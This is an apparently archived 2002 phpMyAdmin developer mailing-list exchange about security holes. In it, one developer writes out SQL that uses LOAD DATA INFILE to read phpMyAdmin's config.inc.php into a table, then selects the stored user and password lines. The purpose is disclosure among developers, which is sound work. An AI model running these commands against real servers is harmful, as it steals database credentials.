On Mon, 12 Aug 2002, Marc Delisle wrote:
On Mon, 12 Aug 2002, Marc Delisle wrote:
I've just merged a fix against that, but it needs some testing since I do not have a machine here which is affected by this securety hole.
you won't like me, but I think we should wait to include a fix for a "hole" until a developer can reproduce it.
I'm going to set up a copy of PMA that exhibits the security hole for us to test out bug. Give me a day or two, as I have some more pressing work at the moment.
Robin,
the "goto" problem?
Marc
I've checked out the goto problem, and you were right, it is fixed in the recent releases. It now limits you to files only in the phpMyAdmin install directory. Which can still be a problem in itself I think.
On checking out the other problem with systems totally open using the config mechanism, try out this series of SQL Commands:
First time around: CREATE TABLE testB ( t mediumtext ); LOAD DATA INFILE '/home/robbat2/public_html/PMA/config.inc.php' INTO TABLE testB FIELDS TERMINATED BY '\n' LINES TERMINATED BY '\n';
Where you need to change the path of the file, and the 'TERMINATED BY' parts for your own systems.
When that completes, I ran this: SELECT * FROM testB WHERE t like '%Server%' AND (t like '%user%' or t like '%password%');
To get just the PMA authentication data.
Of course, this exploit requires that the user have the FILE privilege. This would apply to all cases where PMA has been set up with the user as root, or anybody else with the FILE privilege.
I'm carrying on looking for more holes along these lines.